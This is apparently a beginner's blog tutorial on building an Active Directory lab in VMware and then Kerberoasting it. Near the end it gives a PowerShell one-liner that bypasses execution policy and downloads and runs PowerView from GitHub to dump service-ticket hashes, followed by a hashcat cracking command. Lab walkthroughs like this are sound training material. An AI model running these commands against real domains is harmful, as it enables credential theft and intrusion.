Setting up an Active Directory Lab for Red Teaming


Hello Everyone , this blog is just a noob guide to set up a active directory lab and then to perform a kerberos roasting attack on it from the attacker point of view.

Things to Know before getting into it?

1.What is Active Directory ?

Active Directory is a Microsoft Technology that has been used to manage network services & computers and other devices on a network. It is a primary feature of Windows Server, an operating system that runs both local and Internet-based servers.

Requirements for Setting Up

Installing a Windows 2016 Server in Vmware Workstation

Step 1 : Open the Vmware Application and Click on Create a New Virtual Machine

Step 2 : Choose i will install Operating System and proceed further.

Step 3 : Choose the Operating System and Version of it.

Step 4 : Give the name for the Machine.

Step 5 : Choose the size and Split the data disk into Multiple files.

Step 6 : Click on Finish Button.

Step 7 : Go to the Virtual Machine setting on choose the ISO of the Operating System Windows Server 2016, that we are going to Install.

Step 8 : Change the Network Adapter setting to Bridged Network & replicate physical network connection .

Step 9 : Save all the changes and Turn On the Virtual Box,

Step 10 : Click on install button to start the Installation.

Step 11 : Choose the second option Standard Evaluation(Desktop Experience) and proceed further.

Step 12 : Choose custom Install Windows Only (advance) option and click on next button.

Step 13 : Choose the unallocated space and click on next button the Installation will be started.

Step 14 : After Successful installation , the Virtual Box will ask for Customize Setting the password for the Administrator user.

Step 15 : Then Click on the Vmware tools on the VMware menu, and start installing it for the Optimization of the Guest Operating System Performance.

Step 16 : Navigate to the File Explorer for the setup installation.

Step 17 : After successful installation , restart the virtual box.

Building an Active Directory using Powershell

Open the Power shell with Run as Administrator.

NOTE : To know about the Power Shell Version , use the following commands.

$PSVersionTable.PSVersion

Get-Host

Installing an Active Directory using Power Shell

Step 1 : Type the following command to start the installation process.

Install-windowsfeature AD-domain-services

Step 2 : To import the AD Command module type the below command.

Step 3 : This one liner PS command to finalize the AD installtion

Install-ADDSForest -CreateDnsDelegation:$false ` -DatabasePath "C:\Windows\NTDS" ` -DomainMode "Win2012R2" ` -DomainName "server1.testlab.local" ` -DomainNetbiosName "server1" `  -ForestMode "Win2012R2" `  -InstallDns:$true `  -LogPath "C:\Windows\NTDS" `  -NoRebootOnCompletion:$false `  -SysvolPath "C:\Windows\SYSVOL" `  -Force:$true

The above One line command will install the AD as the first Domain Controller in a new forest.

NOTE : It will name the name as server1.testlab.local , through out the blog.

After successful installation , it will restart automatically.

Step 4 : To install the Remote Server Administration Tools Pack, type the below command.

Install-WindowsFeature RSAT-ADDS

Step 5 : To Add the users to the Domain , type the below command.

net user user1 Passw0rd! /ADD /DOMAIN

Step 6 : And also add that user to the Domain administrative group.

net group Domain Admins user1 /add

Step 7 : To Verify that the user has been added successfully , type the following command.

net users /domain

Step 8 : To Verify that the user has been added successfully to the Domain Administrative group, type the following command.

net group /domain "Domain Admins"

Introducing an Attacker

Step 1 : Download the Windows 7 VM from the https://developer.microsoft.com/en-us/microsoft-edge/tools/vms/ and then start importing it into the Virtual Box.

Step 2 : Navigate to the Network and Sharing Center.

Step 3 : Choose the change adapter setting option.

Step 4 : Right Click on the Network Adapter and Choose the Properties option.

Step 5 : Configure the DNS according to your Windows Server 2016 machine.

Step 6 : Disable the Network Adapter.

Step 7 : Enable the Network Adapter .

Step 8 : Navigate to My Computer, right click on it and choose Properties Option.

Step 9 : Click on Change setting button.

Step 10 : Specify the Domain name by clicking on the radio button option .

Step 11 : If it is able to reach the Domain , it will ask you to Enter the username and password for the User (Don’t enter the DC username and password).

Step 12 : It will show a Successful message, if it is correct username.

Step 13 : Restart the machine to see the Domain Changes.

Step 14 : You can see there is domain name below the password . which shows the user has been added successfully .

2.What is Kerberoasting ?

Kerberoasting is an attack method that allows an attacker to crack the passwords of service accounts in Active Directory offline and without fear of detection.

Step 1: Let’s create a Vulnerable service for one of the user, type the following command .

setspn -s http/server1.testlab.local:80 user1

Step 2 : Now , here comes the one line PS command which will perform the Kerberoasting.

powershell -ep bypass -c "IEX (New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/nettitude/PoshC2/master/Modules/powerview.ps1') ; Invoke-Kerberoast -OutputFormat HashCat|Select-Object -ExpandProperty hash | out-file -Encoding ASCII kerb-Hash1.txt"

Step 3 : Now we have got the Hash that will be saved in a text file.

Step 4 - Any domain user has the rights by default on a standard domain to request a copy of the service accounts and there correlating password hash.

Decrypt the Hash using Hashcat

Step 1 - Now we have to decrypt the hash and get the password of the user, with the help of hashcat we can crack the hash using the following command.

hashcat -m 13100 kerb-Hash1.txt /usr/share/wordlists/rockyou.txt --force

Step 2 - It will take few minutes to decrypt the hash, Once the hash is decrypted you will get the password.

Thanks for Reading !!!

Related Posts

Demystifying Insecure Deserialisation on JSF Application

JSF Viewstate Deserialisation

Exploiting Out-Of-Band XXE on Wildfire

Data Exfiltration using XXE via HTTP LOCK Method

Cyber-Gym 4.0 CTF Writeup

Detailed writeup of Internal CTF

Cyber-Gym 3.0 CTF Writeup

Creator and Organiser of the event

Cyber-Gym 2.0 CTF Writeup

Detailed writeup of Internal CTF

Recon with Me !!!

Security Through Intelligent Automation